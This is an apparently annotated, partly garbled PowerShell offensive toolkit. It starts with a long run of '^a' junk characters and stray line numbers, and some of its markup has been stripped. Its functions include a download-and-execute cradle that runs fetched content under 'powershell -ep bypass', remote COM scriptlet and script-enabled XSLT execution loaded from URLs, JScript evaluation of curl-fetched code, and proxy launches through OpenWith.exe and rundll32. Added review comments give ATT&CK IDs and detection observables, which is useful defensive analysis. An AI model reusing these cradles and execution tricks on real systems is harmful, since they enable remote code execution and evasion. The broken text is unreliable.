^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a c^a^l^c^ ^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a 225 | " -BackgroundColor Gray 226 | 227 | 228 | }Catch { 229 | 230 | throw "Write-Host 'Mistake because 
input Your Strings ' "

        }



    }




}



function invoke-help {
    # Prints the menu. $Pattern is required but never used. Several listed
    # names (invoke-ConfusionJS, invoke-Confusions-LLMTCOMCLSID,
    # invoke-lateralmovement) are not defined in the part of this file
    # visible here - verify they exist before relying on the menu.
    # NOTE: the Write-Host argument below is a plain double-quoted string that
    # itself contains double quotes ("WScript.Shell", "notepad.exe"); as shown
    # those would terminate the string early. If the original used a here-string
    # (@" ... "@) that marker has been lost in this listing - confirm the file parses.


    [CmdletBinding()]

    param(

        [Parameter(Mandatory=$true)]

        [Parameter(Position = 0, ParameterSetName = 'Pattern')]
        [String]
        $Pattern


    )

    # NOTE: '=' assigns. Runs whenever $Pattern is non-empty (always, it is Mandatory).
    if ($like = $Pattern) {
        Write-Host "

1 invoke-ConfusionJS -Command 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")'
2 invoke-Confusions-LLMTCOMCLSID -CLSID
3 Invoke-COMScriptlet -SCT http:///local.sct/
4 invoke-DLLLaunchApplication -CML calc.exe
5 invoke-lateralmovement -Command calc.exe
6 invoke-VBNET -CMLShell calc.exe
7 invoke-XMLTransform -XSL URL -XML URL
8 invoke-OpenWith -CML notepad.exe
9 invoke-DxCap -CML notepad.exe
10 invoke-ApplicationShellExecute -CML calc.exe
11 invoke-ADinfo -Type List
12 Get-TokenMsftEdge -Type List
13 invoke-URLPSShell -URI URL!

"
    }
}


function invoke-URLPSShell {
    <#


    .Author Matt harr0ey @harr0ey
    .License BSD3
    .Required Dependencies : None
    .Optional Dependencies : None

    .Description vicarious of Broadly Execute in Natural Mode Powershell Remotely Script

    .Review
    Download-and-execute cradle: fetches $URI with Invoke-WebRequest and
    spawns a child powershell.exe with "-ep bypass" (ATT&CK T1059.001 with
    T1105 for the fetch). There is no TLS pinning, hash or signature check on
    what is fetched. As written the whole web response OBJECT, not the
    downloaded text, is what gets passed as the command argument, so the
    child receives that object's string form rather than the script body
    (verify on the target) - the downloaded body is never extracted from the
    response. Observables: powershell.exe spawning powershell.exe with
    "-ep bypass" on its command line, the 4104 script-block record of this
    function, and the outbound HTTP(S) request from the PowerShell host.


    .Exmaple
    PS:> invoke-URLPSShell -URI !URLScript



    #>


    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]

        [Parameter(Position = 0, ParameterSetName = 'URI')]

        [string]$URI

    )

    if ($URI) {

        try {
            # Response object (status, headers, content, ...), not a string.
            $Conveyor = Invoke-WebRequest $URI
            # Child PowerShell with ExecutionPolicy Bypass; $Conveyor is
            # converted to a string for the native command line.
            powershell -ep bypass /c $Conveyor

        }Catch {

            # Every failure (DNS, HTTP error, child spawn) collapses to this one message.
            throw "[ ! ] Error Via Non-entrance The URL"

        }

    }

}




function invoke-ADinfo {

    <#


    .Author ( @harr0ey )
    .License BSD3
    .Required Dependencies: None
    .Optional Dependencies: None



    .Broadly
    display System INFo List AD/Domain Users

    .Review
    Does not touch Active Directory at all: it instantiates one COM object by
    CLSID (the variable name suggests a WScript shell object; the CLSID is not
    resolved here - verify) and queries the local CIM_System class. The final
    line adds a CimInstance and a COM object with '+', which is not a defined
    operation for those types; expect an error or a meaningless result rather
    than a user list - verify. $Type is tested but never used.



    .Example
    PS:> invoke-ADinfo -Type List

    #>

    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'Type')]
        [String]$Type

    )



    # NOTE: '=' assigns. Runs whenever $Type is non-empty (always, it is Mandatory).
    if ($like = $Type) {
        $WscriptSysinfo = [activator]::CreateInstance([type]::GetTypeFromCLSID("{093FF999-1EA0-4079-9525-9614C3504B74}"))
        $CIMSysinfo = Get-CimInstance CIM_System
        $CIMSysinfo+$WscriptSysinfo

    }
}

function invoke-ApplicationShellExecute {

    <#


    .Author ( @harr0ey )
    .License BSD3
    .Required Dependencies: None
    .Optional Dependencies: None



    .Broadly
    Execute Command line Via use lateral Movement CLSID/COM

    .Review
    Not lateral movement: this is local process creation through the
    Shell.Application COM object (CLSID {13709620-C279-11CE-A49E-444553540000})
    and its ShellExecute method, instead of Start-Process or a cmd child.
    Before launching $CML it calls ShellExecute("pcalua") ten times (lines
    below), which just opens the Program Compatibility Assistant ten times and
    appears to serve no purpose beyond noise. Observable: the child process
    of powershell.exe created via ShellExecute, plus the ten pcalua.exe
    launches preceding it.



    .Example
    PS:> invoke-ApplicationShellExecute -CML calc.exe

    #>

    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'CML')]
        [String]$CML

    )



    # NOTE: '=' assigns. Runs whenever $CML is non-empty (always, it is Mandatory).
    if ($like = $CML) {

        # Unused copy of the parameter.
        $ADDValueLLMTShell = $CML
        # Shell.Application
        $s2 = [activator]::CreateInstance([type]::GetTypeFromCLSID("{13709620-C279-11CE-A49E-444553540000}"))
        # Ten launches of pcalua (Program Compatibility Assistant) with no
        # arguments; unrelated to $CML.
        $s2.Application.ShellExecute("pcalua")
        $s2.Application.ShellExecute("pcalua")
        $s2.Application.ShellExecute("pcalua")
        $s2.Application.ShellExecute("pcalua")
        $s2.Application.ShellExecute("pcalua")
        $s2.Application.ShellExecute("pcalua")
        $s2.Application.ShellExecute("pcalua")
$s2.Application.ShellExecute("pcalua")
        $s2.Application.ShellExecute("pcalua")
        $s2.Application.ShellExecute("pcalua")
        # The actual launch: ShellExecute of the caller's command line.
        $s2.Application.ShellExecute("$CML")

    }
}

function Get-TokenMsftEdge {
    # Duplicate of PSBrowser/Get-TokenMSEdge.ps1 with the parameter renamed to
    # -Type (the README and menu call it with "-Type List"). Despite "Token"
    # in the name it reads TypedURLs - the address-bar history of legacy
    # (EdgeHTML) Edge kept in its AppContainer registry store under HKCU - not
    # any credential, cookie or token. Runs as the current user, no elevation.
    # Where the key is absent (a browser build that keeps history elsewhere -
    # verify), Get-ItemProperty emits a non-terminating error and returns nothing.


    # SupportsPaging advertises -First/-Skip/-IncludeTotalCount, but
    # $PSCmdlet.PagingParameters is never consulted, so they are ignored.
    [CmdletBinding(SupportsPaging = $true)]

    param(

        # Required, but the value is never used.
        [Parameter(Mandatory=$True,Position=0)]



        [parameter(Mandatory=$true,ParameterSetName="NULL")]



        [System.String]$Type

    )



    # Assignment to $null (value discarded); the condition evaluates the
    # assigned value, so this behaves like `if ($Type)` - verify. Since the
    # parameter is Mandatory the branch always runs.
    if ($null = $Type) {

        $SnifferEdgedrag = Join-Path -Path "HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\" -ChildPath TypedURLs

        # Emits the TypedURLs property bag (url1..urlN plus PS* metadata).
        Get-ItemProperty -Path $SnifferEdgedrag

        # Out-String with no pipeline input; does not affect the line above.
        ( Out-String )


    }
}

function invoke-OpenWith {

    <#


    .Author ( @harr0ey )
    .License BSD3
    .Required Dependencies: None
    .Optional Dependencies: None



    .Broadly
    Tool Command line Execution Via OpenWith.exe USe OpenWith To Run Command Line Via Default Program

    .Review
    Proxy execution through OpenWith.exe, a signed Windows binary: "/c <file>"
    makes it launch the given program/file (documented in LOLBAS; ATT&CK
    T1218) - confirm the exact switch semantics on the target build.
    Observable: OpenWith.exe spawned by powershell.exe with "/c" on its
    command line, followed by the target as its child.



    .Example
    PS:> invoke-OpenWith -CML notepad.exe

    #>

    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'CML')]
        [String]$CML

    )



    # NOTE: '=' assigns. Runs whenever $CML is non-empty (always, it is Mandatory).
    if ($like = $CML) {

        # Unused copy of the parameter.
        $ADDValueOpenWith = $CML
        OpenWith.exe /c $CML


    }
}


function invoke-XMLTransform {

    <#
    .Author ( bohop )
    .License BSD3

    Require Dependencies : None
    Optional Dependencies : None

    .Broadly
    Powershell Function XML Execute XSL Using Transform XML To Send Reader XSL in Powershell Object XML

    .Review
    Script-enabled XSLT: XsltSettings.EnableScript=1 allows msxsl:script
    blocks in the stylesheet to run arbitrary code during the transform (the
    sample stylesheet below uses WScript.Shell), and the XmlUrlResolver lets
    the stylesheet and input be loaded from remote URLs. The output file 'z'
    is deleted immediately, so the script block's side effects are the only
    lasting result. Script support exists on .NET Framework PowerShell; the
    .NET Core based PowerShell 7 rejects script-enabled stylesheets - verify.
    ATT&CK T1220 (XSL Script Processing). Observable: the PowerShell host
    fetching the two URLs and the process the script block creates.

    .Note1
    first Thing should Create File XSL this code Next
    (the XSL element markup around the script below was stripped in this listing;
    only the embedded JScript survived)




    function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
    return nodelist.nextNode().xml;

    }






    .Note2
    after Upload XSL To Gist in Github You can click to raw and add this URL XSL in XML This Function href-XML Code next
    (the XML document markup, including the xml-stylesheet href, was stripped
    in this listing; only the text node below survived)




    Microsoft



    #>

    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]

        # $XML is a second, untyped parameter with no attributes (not mandatory).
        [String]$XSL,$XML
    )

    # $PSCmdlet is always set inside an advanced function and '=' assigns, so
    # this guard is always true.
    if ($like = $PSCmdlet) {
        # Unused copies of the parameters.
        $0xAddXSL = $XSL
        $0x0AddXML = $XML
        # Load the stylesheet with scripting enabled and a URL resolver,
        # transform $XML into a file named 'z' in the current directory, then
        # remove that file.
        $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load("$XSL",$s,$r);$x.Transform("$XML",'z');del z;


    }

}

function invoke-VBNET {
    <#

    .Author Matt Harr0ey
    .License BSD3
    .Require Dependencies : None
    .Optional Dependencies : None

    Broadly
    Command line CML Execution using .NET VisualBasic Object

    .Review
    Microsoft.VisualBasic.Interaction.Shell() starts a process directly from
    managed code, avoiding Start-Process and any cmd/WScript child. The window
    style is passed as the string "0", which is coerced to AppWinStyle.Hide
    (hidden window) - confirm. LoadWithPartialName is deprecated, silently
    returns $null when the assembly is missing, and is repeated 16 times here
    for no additional effect; on this script's normal path the assembly is
    already loaded by the MsgBox banner at the top of the file. Each bare
    (un-[void]ed) call below also emits the assembly object to the pipeline.


    .Example invoke-VBNET -CMLShell calc.exe



    #>

    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'CMLShell')]
        [String]$CMLShell

    )

    # NOTE: '=' assigns. Runs whenever $CMLShell is non-empty (always, it is Mandatory).
    if ($like = $CMLShell) {

        try {
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            # The launch: VB Shell(command, windowStyle).
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::Shell("$CMLShell","0");

        }Catch {

            throw '[!]Error: Add CML Execution'

        }

    }
}

function Invoke-COMScriptlet {
    # Loads a COM scriptlet through the "script:" moniker
    # (GetObject("script:<url-or-path>")) and calls a method named Exec on the
    # resulting object, so the .sct must itself define Exec. This is the
    # scriptlet-moniker execution path better known via
    # "regsvr32 /s /n /u /i:<url> scrobj.dll" (ATT&CK T1218.010), here driven
    # from PowerShell through the VB Interaction.GetObject helper without
    # spawning regsvr32. When $SCT is a URL the scriptlet is fetched over the
    # network with no integrity check. Observables: scrobj.dll loaded into the
    # PowerShell host (expected - verify) and the outbound fetch.


    [CmdletBinding()]

    param (

        [Parameter(Mandatory=$true)]
        [Parameter(Position = 0, ParameterSetName = 'SCT')]
        [String]$SCT

    )
    # NOTE: '=' assigns. Runs whenever $SCT is non-empty (always, it is Mandatory).
    if ($like = $SCT) {

        try {
            # Unused copy of the parameter.
            $SCTAddValue = "$SCT"
            # First call is not [Void]-ed and emits the assembly object; the
            # nine repeats that follow load nothing new.
            [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')
            [Void] [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic')

            [Void] 
[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject("script:$SCT").Exec(0) 656 | } Catch { 657 | throw ' [!] Error: URL SCT COM File ' 658 | 659 | } 660 | 661 | 662 | } 663 | 664 | } 665 | 666 | function invoke-DLLLaunchApplication { 667 | 668 | <# 669 | 670 | .Author Matt Harr0ey 671 | 672 | .Licence BSD3 673 | 674 | Require Dependencies : None 675 | Optional Dependencies : None 676 | 677 | .Broadly 678 | CML Command Line Execution using DLL Via Launch Application Function 679 | 680 | .Example 681 | PS:> invoke-DLLLaunchApplication 682 | #> 683 | 684 | 685 | [CmdletBinding()] 686 | param ( 687 | 688 | [Parameter(Mandatory=$true)] 689 | 690 | [Parameter(Position = 0, ParameterSetName = 'CML')] 691 | 692 | [String]$CML 693 | 694 | ) 695 | 696 | if ($like = $CML) { 697 | 698 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 699 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 700 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 701 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 702 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 703 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 704 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 705 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 706 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 707 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 708 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 709 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 710 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 711 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 712 | rundll32.exe 
C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 713 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 714 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 715 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 716 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 717 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 718 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 719 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 720 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 721 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 722 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 723 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 724 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 725 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 726 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication HelloWorld 727 | rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication $CML 728 | 729 | } 730 | 731 | } 732 | 733 | function invoke-ConfusionJS { 734 | 735 | 736 | <# 737 | 738 | .Author Matt Harr0ey 739 | 740 | .Licence BSD3 741 | 742 | .Require Dependencies : None 743 | .Optional Dependencies : None 744 | 745 | .Broadly Execution JSCript Via .NET in Reflection Assembly To Excution ActiveX 746 | 747 | .Parameter everything is valid 748 | 749 | 750 | .Parameter Binding Execution is valid 751 | 752 | .Parameter Powershell File is valid 753 | 754 | 755 | #> 756 | 757 | [CmdletBinding()] 758 | 759 | param ( 760 | 761 | [Parameter(Mandatory=$false)] 762 | 763 | [Parameter(Position = 0, ParameterSetName = 'Command')] 764 | [String]$Command,$Remote 765 | ) 766 | 767 | if ($null = $Command) { 768 | Write-Host "" 769 | 
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript') 770 | $Attack = $Command 771 | [void] [Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) 772 | # Will Add Value in This Spaces 773 | # 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")' 774 | 775 | } 776 | elseif ($like = $Remote) { 777 | 778 | $MMCC002=curl.exe --basic "$Remote" 779 | [Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript') 780 | [Microsoft.JScript.Eval]::JScriptEvaluate($MMCC002,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine()) 781 | 782 | } 783 | } 784 | 785 | function invoke-Confusions-LLMTCOMCLSID { 786 | 787 | [CmdletBinding()] 788 | 789 | param ( 790 | 791 | [Parameter(Mandatory=$true)] 792 | 793 | [Parameter(Position = 0, ParameterSetName = 'CLSIDCOM')] 794 | 795 | [String]$CLSIDCOM 796 | ) 797 | 798 | if ($null = $PSCmdlet) { 799 | 800 | try { 801 | $addValue = $CLSIDCOM 802 | $COMEx = [Activator]::CreateInstance([type]::GetTypeFromCLSID("$CLSIDCOM")) 803 | 804 | } Catch { 805 | 806 | throw 'Where CLSID Letters' 807 | } 808 | 809 | } 810 | 811 | } 812 | 813 | function invoke-lateralmovement { 814 | 815 | <# 816 | 817 | .Author Matt Harr0ey 818 | 819 | .Licence BSD3 820 | .Require Dependencies : None 821 | .Optional Dependencies : None 822 | 823 | 824 | .Broadly Lateral Movement Using ShellApp COM To Command Line Execution 825 | 826 | .Example invoke-lateralmovement -Command calc.exe 827 | 828 | #> 829 | 830 | [CmdletBinding()] 831 | param ( 832 | 833 | [Parameter(Mandatory=$true)] 834 | 835 | [Parameter(Position = 0, ParameterSetName = 'Command')] 836 | 837 | [String]$Command 838 | 839 | ) 840 | if ($null = $PSCommandPath) { 841 | 842 | $ExampleLLMT1 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 843 | $ExampleLLMT2 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 844 | $ExampleLLMT3 = 
[Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 845 | $ExampleLLMT4 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 846 | $ExampleLLMT5 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 847 | $ExampleLLMT6 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 848 | $ExampleLLMT7 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 849 | $ExampleLLMT8 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 850 | $ExampleLLMT9 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 851 | $ExampleLLMT10 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 852 | $ExampleLLMT11 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 853 | $ExampleLLMT12 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 854 | $ExampleLLMT13 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 855 | $ExampleLLMT14 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 856 | $ExampleLLMT15 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 857 | $ExampleLLMT16 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 858 | $ExampleLLMT17 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 859 | $ExampleLLMT18 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 860 | $ExampleLLMT19 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 861 | $ExampleLLMT20 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 862 | $ExampleLLMT21 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 863 | $ExampleLLMT22 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 864 | $ExampleLLMT23 = 
[Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 865 | $ExampleLLMT24 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 866 | $ExampleLLMT25 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 867 | $ExampleLLMT26= [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 868 | $ExampleLLMT27 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 869 | $ExampleLLMT28 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 870 | $ExampleLLMT29 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 871 | $ExampleLLMT30 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 872 | $ExampleLLMT31 = [Activator]::CreateInstance([type]::GetTypeFromProgID("Shell.Application")) 873 | 874 | $ExampleLLMT1.Application.Application.Application.Application.ShellExecute("pcalua") 875 | $ExampleLLMT2.Application.Application.Application.Application.ShellExecute("pcalua") 876 | $ExampleLLMT3.Application.Application.Application.Application.ShellExecute("pcalua") 877 | $ExampleLLMT4.Application.Application.Application.Application.ShellExecute("pcalua") 878 | $ExampleLLMT5.Application.Application.Application.Application.ShellExecute("pcalua") 879 | $ExampleLLMT6.Application.Application.Application.Application.ShellExecute("pcalua") 880 | $ExampleLLMT7.Application.Application.Application.Application.ShellExecute("pcalua") 881 | $ExampleLLMT8.Application.Application.Application.Application.ShellExecute("pcalua") 882 | $ExampleLLMT9.Application.Application.Application.Application.ShellExecute("pcalua") 883 | $ExampleLLMT10.Application.Application.Application.Application.ShellExecute("pcalua") 884 | $ExampleLLMT11.Application.Application.Application.Application.ShellExecute("pcalua") 885 | $ExampleLLMT12.Application.Application.Application.Application.ShellExecute("pcalua") 886 | 
$ExampleLLMT13.Application.Application.Application.Application.ShellExecute("pcalua") 887 | $ExampleLLMT14.Application.Application.Application.Application.ShellExecute("pcalua") 888 | $ExampleLLMT15.Application.Application.Application.Application.ShellExecute("pcalua") 889 | $ExampleLLMT16.Application.Application.Application.Application.ShellExecute("pcalua") 890 | $ExampleLLMT17.Application.Application.Application.Application.ShellExecute("pcalua") 891 | $ExampleLLMT18.Application.Application.Application.Application.ShellExecute("pcalua") 892 | $ExampleLLMT19.Application.Application.Application.Application.ShellExecute("pcalua") 893 | $ExampleLLMT20.Application.Application.Application.Application.ShellExecute("pcalua") 894 | $ExampleLLMT21.Application.Application.Application.Application.ShellExecute("pcalua") 895 | $ExampleLLMT22.Application.Application.Application.Application.ShellExecute("pcalua") 896 | $ExampleLLMT23.Application.Application.Application.Application.ShellExecute("pcalua") 897 | $ExampleLLMT24.Application.Application.Application.Application.ShellExecute("pcalua") 898 | $ExampleLLMT25.Application.Application.Application.Application.ShellExecute("pcalua") 899 | $ExampleLLMT26.Application.Application.Application.Application.ShellExecute("pcalua") 900 | $ExampleLLMT27.Application.Application.Application.Application.ShellExecute("pcalua") 901 | $ExampleLLMT28.Application.Application.Application.Application.ShellExecute("pcalua") 902 | $ExampleLLMT29.Application.Application.Application.Application.ShellExecute("pcalua") 903 | $ExampleLLMT30.Application.Application.Application.Application.ShellExecute("pcalua") 904 | try { 905 | $ExampleLLMT31.Application.Application.Application.Application.ShellExecute("$Command") 906 | } catch { 907 | throw "Add Your Command" 908 | 909 | } 910 | 911 | 912 | } 913 | 914 | 915 | } 916 | 917 | 918 | --------------------------------------------------------------------------------